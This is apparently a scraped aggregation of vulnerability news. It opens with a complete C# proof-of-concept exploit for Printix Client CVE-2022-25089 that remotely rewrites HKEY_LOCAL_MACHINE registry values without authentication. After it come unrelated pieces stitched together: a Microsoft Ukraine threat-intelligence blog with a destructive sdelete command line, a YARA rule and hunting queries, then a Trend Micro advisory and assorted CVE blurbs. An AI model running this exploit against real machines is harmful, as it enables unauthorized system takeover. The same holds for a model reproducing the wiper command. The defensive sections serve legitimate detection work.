Printix Secure Cloud Print Management through 1.3.1106.0 incorrectly uses Privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData.

**Printix Client 1.3.1106.0 - Remote Code Execution (RCE)**

    # Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
    # Date: 3/1/2022
    # Exploit Author: Logan Latvala
    # Vendor Homepage: https://printix.net
    # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
    # Version: <= 1.3.1106.0
    # Tested on: Windows 7, Windows 8, Windows 10, Windows 11
    # CVE : CVE-2022-25089
    # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089
    
    using Microsoft.Win32;
    using Newtonsoft.Json;
    using Newtonsoft.Json.Converters;
    using System;
    using System.Collections.Generic;
    using System.Diagnostics;
    using System.Linq;
    using System.Text;
    using System.Threading;
    using System.Threading.Tasks;
    
    /**
     * ________________________________________
     * 
     * Printix Vulnerability, CVE-2022-25089
     * Part of a Printix Vulnerability series
     * Author: Logan Latvala
     * Github: https://github.com/ComparedArray/printix-CVE-2022-25089
     * ________________________________________
     * 
     */
    
    
    namespace ConsoleApp1a
    {
    
    	public class PersistentRegistryData
    	{
    		public PersistentRegistryCmds cmd;
    
    		public string path;
    
    		public int VDIType;
    
    		public byte[] registryData;
    	}
    
    	[JsonConverter(typeof(StringEnumConverter))]
    	public enum PersistentRegistryCmds
    	{
    		StoreData = 1,
    		DeleteSubTree,
    		RestoreData
    	}
    	public class Session
    	{
    		public int commandNumber { get; set; }
    		public string host { get; set; }
    		public string data { get; set; }
    		public string sessionName { get; set; }
    		public Session(int commandSessionNumber = 0)
    		{
    			commandNumber = commandSessionNumber;
    			switch (commandSessionNumber)
    			{
    				//Incase it's initiated, kill it immediately.
    				case (0):
    					Environment.Exit(0x001);
    					break;
    
    				//Incase the Ping request is sent though, get its needed data.
    				case (2):
    					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
    					Console.Write("IP: ");
    					host = Console.ReadLine();
    					Console.WriteLine("Host address set to: " + host);
    
    					data = "pingData";
    					sessionName = "PingerRinger";
    					break;
    
    				//Incase the RegEdit request is sent though, get its needed data.
    				case (49):
    					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
    					Console.Write("IP: ");
    					host = Console.ReadLine();
    					Console.WriteLine("Host address set to: " + host);
    
    					PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
    					persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
    					persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
    														 //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";
    					Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
    					Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
    					Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
    					Console.Write("Registry Node: ");
    					persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix");
    					Console.WriteLine("Full Address Set To:  " + persistentRegistryData.path);
    
    					//persistentRegistryData.registryData = new byte[2];
    					//byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);
    
    					Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword  3. Qword 4. Multi String  \n");
    					Console.Write("Type:  ");
    					int dataF = int.Parse(Console.ReadLine());
    					Console.WriteLine("Set Data to: " + dataF);
    
    					Console.WriteLine("\n What value is your type?  \n");
    					Console.Write("Value:  ");
    					string dataB = Console.ReadLine();
    					Console.WriteLine("Set Data to: " + dataF);
    
    					byte[] loader = null;
    					List<byte> byteContainer = new List<byte>();
    					//Dword = 4
    					//SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!)
    
    					switch (dataF)
    					{
    						case (1):
    
    							loader = selectDataType(dataB, RegistryValueKind.String);
    							byteContainer.Add(1);
    							break;
    						case (2):
    							loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
    							byteContainer.Add(4);
    							break;
    						case (3):
    							loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
    							byteContainer.Add(11);
    							break;
    						case (4):
    							loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
    							byteContainer.Add(7);
    							break;
    
    					}
    
    					int pathHolder = 0;
    					foreach (byte bit in loader)
    					{
    						pathHolder++;
    						byteContainer.Add(bit);
    					}
    
    					persistentRegistryData.registryData = byteContainer.ToArray();
    					//added stuff:
    
    					//PersistentRegistryData data = new PersistentRegistryData();
    					//data.cmd = PersistentRegistryCmds.RestoreData;
    					//data.path = "";
    
    
    					//data.cmd 
    					Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
    					data = JsonConvert.SerializeObject(persistentRegistryData);
    
    					break;
    				//Custom cases, such as custom JSON Inputs and more.
    				case (100):
    					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
    					Console.Write("IP: ");
    					host = Console.ReadLine();
    					Console.WriteLine("Host address set to: " + host);
    
    					Console.WriteLine("\n What Data Should Be Sent?\n");
    					Console.Write("Data: ");
    					data = Console.ReadLine();
    					Console.WriteLine("Data set to: " + data);
    
    					Console.WriteLine("\n What Session Name Should Be Used? \n");
    					Console.Write("Session Name: ");
    					sessionName = Console.ReadLine();
    					Console.WriteLine("Session name set to: " + sessionName);
    					break;
    			}
    
    
    		}
    		public static byte[] selectDataType(object value, RegistryValueKind format)
    		{
    			byte[] array = new byte[50];
    
    			switch (format)
    			{
    				case RegistryValueKind.String: //1
    					array = Encoding.UTF8.GetBytes((string)value);
    					break;
    				case RegistryValueKind.DWord://4
    					array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
    					break;
    				case RegistryValueKind.QWord://11
    					if (value == null)
    					{
    						value = 0L;
    					}
    					array = BitConverter.GetBytes((long)value);
    					break;
    				case RegistryValueKind.MultiString://7 
    					{
    						if (value == null)
    						{
    							value = new string[1] { string.Empty };
    						}
    						string[] array2 = (string[])value;
    						foreach (string s in array2)
    						{
    							byte[] bytes = Encoding.UTF8.GetBytes(s);
    							byte[] second = new byte[1] { (byte)bytes.Length };
    							array = array.Concat(second).Concat(bytes).ToArray();
    						}
    						break;
    					}
    			}
    			return array;
    		}
    	}
    	class CVESUBMISSION
        {
    		static void Main(string[] args)
    		{
    		FORCERESTART:
    			try
    			{
    
    				//Edit any registry without auth: 
    				//Use command 49, use the code provided on the desktop...
    				//This modifies it directly, so no specific username is needed. :D
    
    				//The command parameter, a list of commands is below.
    				int command = 43;
    
    				//To force the user to input variables or not.
    				bool forceCustomInput = false;
    
    				//The data to send, this isn't flexible and should be used only for specific examples.
    				//Try to keep above 4 characters if you're just shoving things into the command.
    				string data = "{\"profileID\":1,\"result\":true}";
    
    				//The username to use.
    				//This is to fulfill the requriements whilst in development mode.
    				DefaultValues.CurrentSessName = "printixMDNs7914";
    
    				//The host to connect to. DEFAULT= "localhost"
    				string host = "192.168.1.29";
    
    			//								Configuration Above
    
    			InvalidInputLabel:
    				Console.Clear();
    				Console.WriteLine("Please select the certificate you want to use with port 21338.");
    				//Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
    				Console.WriteLine("Already selected, client authentication isn't needed.");
    
    				Console.WriteLine(" /───────────────────────────\\ ");
    				Console.WriteLine("\nWhat would you like to do?");
    				Console.WriteLine("\n	1. Send Ping Request");
    				Console.WriteLine("	2. Send Registry Edit Request");
    				Console.WriteLine("	3. Send Custom Request");
    				Console.WriteLine("	4. Experimental Mode (Beta)\n");
    				Console.Write("I choose option # ");
    
    				try
    				{
    					switch (int.Parse(Console.ReadLine().ToLower()))
    					{
    						case (1):
    							Session session = new Session(2);
    
    							command = session.commandNumber;
    							host = session.host;
    							data = session.data;
    							DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
    
    
    
    							break;
    						case (2):
    							Session sessionTwo = new Session(49);
    
    							command = sessionTwo.commandNumber;
    							host = sessionTwo.host;
    							data = sessionTwo.data;
    							DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
    
    							break;
    						case (3):
    
    							Console.WriteLine("What command number do you want to input?");
    							command = int.Parse(Console.ReadLine().ToString());
    							Console.WriteLine("What IP would you like to use? (Default = localhost)");
    							host = Console.ReadLine();
    							Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
    							data = Console.ReadLine();
    
    							Console.WriteLine("What session name do you want to use? ");
    							DefaultValues.CurrentSessName = Console.ReadLine();
    							break;
    						case (4):
    							Console.WriteLine("Not yet implemented.");
    							break;
    					}
    				}
    				catch (Exception e)
    				{
    					Console.WriteLine("Invalid Input!");
    					goto InvalidInputLabel;
    				}
    				
    				Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
    				Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");
    
    				CompCommClient client = new CompCommClient();
    
    
    				byte[] responseStorage = new byte[25555];
    				int responseCMD = 0;
    				client.Connect(host, 21338, 3, 10000);
    
    				client.SendMessage(command, Encoding.UTF8.GetBytes(data));
    				// Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
    				// Check for output multiple times, and see if this is conclusive.
    
    
    
    				//client.SendMessage(51, Encoding.ASCII.GetBytes(data));
    				new Thread(() => {
    					//Thread.Sleep(4000);
    					if (client.Connected())
    					{
    						int cam = 0;
    						// 4 itterations of loops, may be lifted in the future.
    						while (cam < 5)
    						{
    
    							//Reads the datastream and keeps returning results.
    							//Thread.Sleep(100);
    							try
    							{
    								try
    								{
    									if (responseStorage?.Any() == true)
    									{
    										//List<byte> byo1 =  responseStorage.ToList();
    										if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
    										{
    											foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
    											{
    												if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
    												{
    													Console.Write(cam2);
    												}
    											}
    										}else
                                            {
    											
                                            }
    									}
    
    								}
    								catch (Exception e) { Debug.WriteLine(e); }
    								client.Read(out responseCMD, out responseStorage);
    
    							}
    							catch (Exception e)
    							{
    								goto ReadException;
    							}
    							Thread.Sleep(100);
    							cam++;
    							//Console.WriteLine(cam);
    						}
    
    					
    
    
    					}
    					else
    					{
    						Console.WriteLine("[WARNING]: Client is Disconnected!");
    					}
    				ReadException:
    					try
    					{
    						Console.WriteLine("Command Variable Response: " + responseCMD);
    						Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
    						client.disConnect();
    					}
    					catch (Exception e)
    					{
    						Console.WriteLine("After 4.2 Seconds, there has been no response!");
    						client.disConnect();
    					}
    				}).Start();
    
    				Console.WriteLine(responseCMD);
    				Console.ReadLine();
    
    			}
    
    			catch (Exception e)
    			{
    				Console.WriteLine(e);
    				Console.ReadLine();
    
    				//Environment.Exit(e.HResult);
    			}
    
    			goto FORCERESTART;
    		}
    	}
    }

CVE-2022-25089: Offensive Security’s Exploit Database Archive

Printix Secure Cloud Print Management 1.3.1035.0 incorrectly uses Privileged APIs.

Zoho ManageEngine SharePoint Manager Plus before 4329 allows account takeover because authorization is mishandled.

CVE-2022-24306: SharePoint Management and Auditing by ManageEngine SharePoint Manager Plus

本ブログは、Cyber threat activity in Ukraine: analysis and resources – Microsoft Security Response Center の抄訳版です。最新の情報は原文を参照してください。 2022 年

ウクライナにおけるサイバー脅威アクティビティ: 分析とリソース

Hello everyone! This episode will be about Microsoft Patch Tuesday for February 2022. I release it pretty late, because of the my previous big episode about the blindspots in the Knowledge Bases of Vulnerability Scanners. Please take a look if you haven’t seen it. Well, if you are even slightly interested in the world news, […]

Microsoft Patch Tuesday February 2022

UPDATE 27 Apr 2022: See Updated malware details and Microsoft security product detections below as discussed in the Special Report: Ukraine.
UPDATE 02 MAR 2022: See Updated malware details and Microsoft security product detections below for additional insights and protections specific to the evolving threats we have identified impacting organizations with ties to Ukraine.

**UPDATE 27 Apr 2022:** See **_Updated malware details and Microsoft security product detections_** below as discussed in the **Special Report: Ukraine**.

**UPDATE 02 MAR 2022:** See **_Updated malware details and Microsoft security product detections_** below for additional insights and protections specific to the evolving threats we have identified impacting organizations with ties to Ukraine.

Microsoft has been monitoring escalating cyber activity in Ukraine and has published analysis on observed activity in order to give organizations the latest intelligence to guide investigations into potential attacks and information to implement proactive protections against future attempts.

We’ve brought together all our analysis and guidance for customers who may be impacted by events in Ukraine into this single location for ease of consumption, all of which is linked below. In this blog, we’ve also included general security guidance for organizations to build cyber resilience. As the situation in the region develops, we will continue to publish new insights and add to this set of resources.

Microsoft has been notifying customers in Ukraine of activity, where possible, and closely coordinating with the government in Ukraine. This support is ongoing.

We have also summarized information about what we are doing around protecting organizations in Ukraine from cyberattacks; protecting against state-sponsored disinformation campaigns; supporting humanitarian assistance; and protecting our employees: Digital technology and the war in Ukraine.

**Published Microsoft analysis of malicious activity in Ukraine**

_Phishing attacks on Ukrainian soldiers:_

*   February 25, 2022 | RiskIQ: UNC1151/GhostWriter Phishing Attacks Target Ukrainian Soldiers

_Recent disk wiping attacks:_

*   February 24, 2022 | RiskIQ: HermeticWiper Compromised Server Used in Attack Chain

_Advanced threat actor ACTINIUM which has consistently pursued access to organizations in Ukraine or entities related to Ukraine affairs:_

*   February 4, 2022 | Microsoft Security Blog: ACTINIUM targets Ukrainian organizations
*   February 4, 2022 | RiskIQ threat intelligence article: ACTINIUM targets Ukrainian organizations
*   February 4, 2022 | Microsoft Threat Analytics article (requires a license): Threat Insights: ACTINIUM targets Ukrainian organizations

_Destructive malware operation and malware family known as WhisperGate targeting multiple organizations in Ukraine:_

*   January 15, 2022 | Microsoft on the Issues Blog: Malware attacks targeting Ukraine government
*   January 15, 2022 | Microsoft Security Blog: Destructive malware targeting Ukrainian organizations
*   January 15, 2022 | RiskIQ threat intelligence article: Destructive malware targeting Ukrainian organizations

OSINT (open source intelligence) articles around activity in Ukraine are published regularly into the RiskIQ Community. The full list is available here: RiskIQ Community articles on Ukraine activity.

**Security guidelines and recommendations**

We recommend that customers review their security posture and implement best practices to build resilience against today’s threats. Below are recommendations and links to resources:

1.  **Cybersecurity hygiene:** Organizations should harden all systems by following basic principles of cyber hygiene to proactively protect against potential threats. Microsoft recommends taking the following steps:

*   Enable multifactor authentication
*   Apply least privilege access and secure the most sensitive and privileged credentials
*   Review all authentication activity for remote access infrastructure
*   Secure and manage systems with up-to-date patching
*   Use anti-malware and workload protection tools
*   Isolate legacy systems
*   Enable logging of key functions
*   Validate your backups
*   Verify your cyber incident response plans are up to date

2.  **Microsoft Security Best Practices:** Microsoft customers can follow best practices that provide clear actionable guidance for security related decisions. These are designed to improve your security posture and reduce risk whether your environment is cloud-only, or a hybrid enterprise spanning cloud(s) and on-premises data centers: Microsoft Security Best Practices  
    
3.  **Protect against ransomware and extortion:** Human-operated ransomware attacks can be catastrophic to business operations and are difficult to clean up, requiring complete adversary eviction to protect against future attacks. Follow our ransomware specific technical guidance to help prepare for an attack, limit the scope of damage, and remove additional risks: Human-operated ransomware
    

****Updated malware details and Microsoft security product detections** **Updated malware details and Microsoft security product detections****

For customers utilizing Microsoft security products, we continue to build and release protections for the evolving threats we have identified impacting organizations with ties to Ukraine. As noted in the published analysis above, there are multiple actors using a variety of tools and techniques in this dynamic threat landscape. Some of these threats are assessed to be more closely tied to nation-state interests, while others seem to be more opportunistically attempting to take advantage of events surrounding the conflict. We have observed attacks reusing components of known malware that are frequently covered by existing detections, while others have used customized malware for which Microsoft has built new comprehensive protections.

**Destructive wiper attacks Destructive wiper attacks**

Beginning with WhisperGate, Microsoft continues to observe destructive malware attacks impacting organizations in Ukraine. These attacks are often the final stage to intrusions that, in some cases, may have predated the current military actions in Ukraine. We assess that the intended objective of these attacks is the disruption, degradation, and destruction of targeted resources. The Microsoft Threat Intelligence Center (MSTIC) assesses that organizations within Ukraine continue to be at high-risk for destructive operations for the foreseeable future.

Microsoft Defender Antivirus provides detections for the wiper attacks in build version **1.363.797.0** or newer. Customers utilizing automatic updates do not need to take additional action. Enterprise customers managing updates should select the detection build **1.363.797.0** or newer and deploy it across their environments.

The following is a list of high-level activities and the related malware that Microsoft has identified and is protecting customers against:

**WhisperGate WhisperGate**

Limited-scope destructive malware attack on January 13, 2022 impacting dozens of systems spanning multiple government, non-profit, and information technology organizations, all based in Ukraine. MSTIC tracks the actor responsible for this attack as DEV-0586 and has not linked it to a previously known activity group. We assess that DEV-0586 continues to be active in Ukraine but is also targeting other countries within the region.

**FoxBlade and SonicVote FoxBlade and SonicVote**

Destructive malware attack originally discovered on February 23, 2022 impacting hundreds of systems spanning multiple government, information technology, financial sector, and energy organizations predominately located in or with nexus to Ukraine. MSTIC has attributed events associated with FoxBlade with medium confidence to IRIDIUM (previously tracked as DEV-0665). Microsoft assesses there will be a continued risk for destructive activity from this group, as we have observed follow-on intrusions since February 23 involving these malicious capabilities. Microsoft is tracking the following malware families related to this activity:

*   FoxBlade (aka HermeticWiper / HermeticWizard)
*   SonicVote (aka HermeticRansom)

IRIDIUM has also periodically leveraged a renamed version of the SysInternals utility _sdelete_(renamed by IRIDIUM to _cdel.exe_) to perform targeted secure deletion of areas of the file system using the following command-line pattern:

c:\Windows\System32\cmd.exe /C C:\Windows\cdel.exe -accepteula -r -s -q c:\Users & C:\Windows\cdel.exe -accepteula -r -s -q c:\ProgramData

**Lasainraw (aka IsaacWiper) Lasainraw (aka IsaacWiper)**

Limited destructive malware attack originally identified by ESET on February 25, 2022. Microsoft continues to investigate this incident and has not currently linked it to attributed threat actors.

**DesertBlade DesertBlade**

Limited destructive malware attack in early March 2022 impacting a single Ukrainian entity. Similar to other destructive capabilities, DesertBlade, which is implemented in Golang, was deployed via hijacked Group Policy Objects (GPOs). DesertBlade is responsible for iteratively overwriting and then deleting overwritten files on all accessible drives (sparing the system if it is a domain controller). Due to the nature of the investigation and partnerships involved, Microsoft is currently not able to share samples of DesertBlade. However, we can share the following hashes as examples of the DesertBlade family:

*   a71c8306b6b8a89c18dea3b1490037593737d59b023000f24da94e3275600b59
*   4ca63406ff189301ccbb54daa6e2da4bc5d03ffc1a8a9756717d95d26abc3906

The following Yara rule can be used to detect DesertBlade using these hashes:

rule DesertBlade { meta: author = "Microsoft Threat Intelligence Center (MSTIC)" description = "Detects Golang package, function, and source file names observed in DesertBlade samples" hash = "a71c8306b6b8a89c18dea3b1490037593737d59b023000f24da94e3275600b59" strings: $s1 = "main.wipe\x00\x00" $s2 = "main.getRandomByte\x00\x00" $s3 = "main.drives\x00\x00" $s4 = "main.main.func3\x00\x00" $s5 = "walk.volumeNameLen\x00\x00" $s6 = "windows.GetLogicalDriveStrings\x00\x00" $s7 = "api.ExplicitAccess\x00\x00" $s8 = "go-acl.GrantSid\x00\x00" $s9 = "/src/w/w.go\x00\x00" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 5MB and filesize > 1MB and all of ($s*) }

**FiberLake (aka DoubleZero) FiberLake (aka DoubleZero)**

On March 22, 2022 CERT-UA published details on a .NET capability being used in destructive attacks tracked by Microsoft as FiberLake (aka DoubleZero). Microsoft has observed FiberLake being used in attacks targeting Ukraine broadcast/media organizations. Microsoft is continuing to investigate this incident and has not currently linked it to known threat activity.

**CaddyWiper and AprilAxe (aka ARGUEPATCH) CaddyWiper and AprilAxe (aka ARGUEPATCH)**

CaddyWiper was first discovered by ESET on March 14, 2022 and has been observed by Microsoft impacting a limited number of organizations in targeted attacks. CaddyWiper is a destructive capability that results in file and drive overwriting, rendering compromised systems unbootable. On April 1, 2022, Microsoft identified a new variant that involved a multi-stage loading process.

In this new variant, the threat actor leveraged a backdoored IDA debugger server executable, which Microsoft has named AprilAxe\*.\* AprilAxe is designed to de-obfuscate and load malicious code from disk. In all observed intrusions, the loader is paired with a variant of CaddyWiper. Microsoft has observed multiple impacted organizations across government, natural resources, banking, and energy organizations. ESET published technical details on this new version of CaddyWiper/ARGUEPATCH. In line with ESET, MSTIC also attributes the intrusion activity and capabilities to IRIDIUM.

**Industroyer.B (aka Industroyer2) Industroyer.B (aka Industroyer2)**

On April 8, 2022, Microsoft observed AprilAxe and CaddyWiper being staged to target an energy organization in Ukraine. During this intrusion, the actors also deployed a malicious ICS/SCADA utility named Industroyer 2, which is capable of interacting with industrial control systems. CERT-UA and ESET published additional technical details on this capability. In line with ESET, MSTIC attributes this intrusion activity and capability to IRIDIUM.

Customers are encouraged to turn on cloud-delivered protection and automatic sample submission in Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. As we continue to investigate these attacks and uncover new data, we will add or update protections.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint customers should look for the following family names for activity related to the wiper attacks:

*   WhisperGate
*   FoxBlade
*   Lasainraw
*   SonicVote
*   CaddyWiper
*   AprilAxe
*   FiberLake
*   Industroyer
*   DesertBlade

The observed wiper attacks can be further limited through additional hardening configurations. When enabled, these features bring more resilience to customer defenses in addition to defending against these specific wiper attacks:

*   Tamper protection prevents common techniques observed to disable security protections on endpoints.
*   Controlled folder access allows only trusted apps to access protected folders. It is typically effective at blocking these wiper attacks.

**Unattributed threat activity**

As part of continued efforts by the MSTIC and Microsoft 365 Defender Research teams to identify threat activity and protect organizations, we continue to discover unattributed threat activity. We will continue to analyze activity and build detections for these threats as they are identified.

As with any observed nation-state actor activity, where possible, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with information they need to help guide their investigations. MSTIC is also actively working with members of the global security community and other strategic partners to share information that can help address this evolving threat through multiple channels. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity.

**Common secondary intrusion behaviors**

Many of the observed attacks have made use of known malware and intrusion tactics, techniques, and procedures (TTPs) that are detected by Microsoft Defender for Endpoint using these common alerts:

*   Suspicious remote activity
*   Suspicious access to LSASS service
*   Microsoft Defender Antivirus tampering
*   Suspicious remote activity

Customers who see incidents that tie one or more of these indicators together should prioritize investigation of the affected devices.

**Opportunistic phishing campaigns**

Taking advantage of interest in the geopolitical conflict, attackers have been observed using tailored domains in phishing attacks. Microsoft SmartScreen and the network protection feature in Microsoft Defender for Endpoint provide protections for customers lured to these domains, including, but not limited to, the following:

*   help-for-ukraine\[.\]eu
*   tokenukraine\[.\]com
*   ukrainesolidarity\[.\]org
*   ukraine-solidarity\[.\]com
*   saveukraine\[.\]today
*   supportukraine\[.\]today

**Hunting for related attacks**

Microsoft Sentinel and Microsoft Defender for Endpoint customers can hunt for related activity through the queries below:

**Microsoft Sentinel**

Microsoft Sentinel offers detection and threat hunting analytics for techniques observed in relation to these threats. These analytics can be found in the Microsoft Sentinel portal or via the Microsoft Sentinel GitHub.

Crash dump disabled on host

This query looks for registry keys being set on a host in order to prevent crash dumps being created.

https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/Crashdumpdisabledonhost.yaml

New EXE deployed via Default Domain or Default Domain Controller Policies

This query looks for executables executed on host that appear to have been deployed via the Default Domain Policy or the Default Domain Controller Policy. These policies are not typically used for distributing executables.

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/NewEXEdeployedviaDefaultDomainorDefaultDomainControllerPolicies.yaml

Potential renamed Sdelete usage

This query looks for command line parameters associated with recursive use of Sdelete against the C drive where the originating process isn’t named _sdelete.exe._

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/Potentialre-namedsdeleteusage.yaml

Sdelete deployed via GPO

This query looks for Sdelete being deployed via GPO and run recursively on a host.

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SdeletedeployedviaGPOandrunrecursively.yaml

**Microsoft Defender for Endpoint**

To locate possible exploitation activity, run the following queries:

Surface suspicious MSHTA process execution

Use this query to look for MSHTA launching with command lines referencing DLLs in the AppData\\Roaming path.

    DeviceProcessEvents
    | where FileName =~ "mshta.exe"
    | where ProcessCommandLine has_all (".dll", "Roaming")
    | where ProcessCommandLine contains @"Roaming\j"
    | extend DLLName = extract(@"[jJ][a-z]{1,12}\.dll", 0, ProcessCommandLine)
    

Surface suspicious Scheduled Task activity

Use this query to look for Scheduled Tasks that may relate to actor activity.

    DeviceProcessEvents
    | where ProcessCommandLine has_all ("schtasks.exe", "create", "wscript", "e:vbscript", ".wav")
    

Potential renamed _sdelete_ usage

Use this query to look for command line parameters associated with the use of a renamed Sysinternals sdelete tool to delete multiple files on the C drive as part of destructive attacks on a host.

    DeviceProcessEvents
    | where InitiatingProcessFileName !~ "sdelete.exe"
    and InitiatingProcessCommandLine has_all ("-accepteula", "-r", "-s", "-q", "c:/")
    and InitiatingProcessCommandLine !has ("sdelete")
    

Microsoft continues to investigate these attacks and improve protections as new data is analyzed. In addition, Microsoft Sentinel and Microsoft 365 Defender have a range of existing queries for the detection of common techniques, such as lateral movement and privilege escalation. We recommend customers use these queries to identify common attacker techniques being used in these attacks.

We continue to monitor activity and will update this page with more information as the situation develops.

Cyber threat activity in Ukraine: analysis and resources

Uncaught exceptions that can be generated in Trend Micro ServerProtection 6.0/5.8 Information Server could allow a remote attacker to crash the process.

Summary

**Release Date**: February 22, 2022  
**CVE Identifier(s)**: CVE-2022-25329 through CVE-2022-25331  
**Platform(s)**: Windows, Network Appliance, EMC Celerra  
**CVSS 3.0 Score(s):** 6.5 - 9.8  
**Severity Rating(s):** Medium - Critical

Trend Micro has released new Critical Patches for Trend Micro ServerProtect that resolves several vulnerabilities related to a static credential, integer overflow and denial-of-service (DoS).

Details

Public

**Affected Version(s)**

Product

Affected Version(s)

Platform

Language(s)

ServerProtect for Storage (SPFS)  

6.0

Windows

English

ServerProtect for Microsoft Windows / Novell NetWare (SPNT) 

5.8

Windows

English

ServerProtect for EMC Celerra (SPEMC)

5.8

EMC Celerra

English

ServerProtect for Network Appliance Filers (SPNAF)

5.8

Network Appliance

English

**  
Solution**

Trend Micro has released the following solutions to address the issue:

These are the minimum recommended version(s) of the patches and/or builds required to address the issue. Trend Micro highly encourages customers to obtain the latest version of the product if there is a newer one available than the one listed in this bulletin.

Customers are encouraged to visit Trend Micro’s Download Center to obtain prerequisite software (such as Service Packs) before applying any of the solutions above.

**  
Vulnerability Details**

**CVE-2022-25329**:  **ServerProtect** **Information Server Static Credential**    
_CVSSv3.1: 9.8: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H_  
Trend Micro ServerProtect 6.0/5.8 Information Server uses a static credential to perform authentication when a specific command is typed in the console.  An unauthenticated remote attacker with access to the Information Server could exploit this to register to the server and perform authenticated actions.

**CVE-2022-25330**:  **ServerProtect Information Server Command Integer Overflow**   
_CVSSv3.1: 8.8: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H_  
Integer overflow conditions that exist in Trend Micro ServerProtect 6.0/5.8 Information Server could allow a remote attacker to crash the process or achieve remote code execution.

**CVE-2022-25331**:  **ServerProtect Information Server Command Denial-of-Service (DoS)**   
_CVSSv3.1: 6.5: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H_  
Uncaught exceptions that can be generated in Trend Micro ServerProtection 6.0/5.8 Information Server could allow a remote attacker to crash the process.

**  
Mitigating Factors**

Exploiting these type of vulnerabilities generally require that an attacker has access (physical or remote) to a vulnerable machine. In addition to timely application of patches and updated solutions, customers are also advised to review remote access to critical systems and ensure policies and perimeter security is up-to-date.

However, even though an exploit may require several specific conditions to be met, Trend Micro strongly encourages customers to update to the latest builds as soon as possible.

**  
Acknowledgement**

Trend Micro would like to thank the following individuals and/or organizations for responsibly disclosing these issues and working with Trend Micro to help protect our customers:

*   Tenable

**  
External Reference(s)**

*   Tenable Advisory ID: TRA-2022-05

Premium

Internal

Partner

Rating:

Category:

Update

Solution Id:

000290507

Feedback

Did this article help you?

Thank you for your feedback!

Thanks for voting.

To help us improve the quality of this article, please leave your email here so we can clarify further your feedback, if neccessary:

We will not send you spam or share your email address.

\*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.

CVE-2022-25331

A vulnerability in Qlik Sense Enterprise on Windows could allow an remote attacker to enumerate domain user accounts. An attacker could exploit this vulnerability by sending authentication requests to an affected system. A successful exploit could allow the attacker to compare the response time that are returned by the affected system to determine which accounts are valid user accounts. Affected systems are only vulnerable if they have LDAP configured.

CVE-2022-0564: Qlik Sense Enterprise on Windows Release notes - November 2021 Initial Release to Patch 16

A Path Traversal vulnerability for a log file in LiveConfig 2.12.2 allows authenticated attackers to read files on the underlying server.

**Changes in version 2.13.1 (01/30/2022):**

*   fixed wrong table order in MySQL schema (table `APIKEYS` couldn’t be created)
*   implemented rate limit for dynamic DNS updates (default: 15 updates per 10 minutes, configurable via LCDefaults key `dns.updateLimit`)
*   create `/etc/ssl/chains` if not existing on initial Apache configuration
*   updated Expat library to v2.4.4

**Changes in version 2.13.0 (10/15/2021):**

*   improved usability for “Delete Mailbox” button (prevent unintended deletion of mailbox)
*   preparing for rate limiting Dynamic DNS updates
*   security fix (file access - low impact level)
*   security fix (stored XSS within own customer data, low impact level)
*   updated Site.pro module
*   IP addresses can optionally be added only to web server vHost config, but not to DNS
*   Debian/Ubuntu: moving intermediate certificate files from `/etc/ssl/certs/*-ca.crt` to `/etc/ssl/chains/*-ca.crt`, adjusting Apache and ProFTPD configuration and running `c_rehash` (workaround for local OpenSSL validation problem/bug with Let’s-Encrypt “R3” certificate, see blog post)
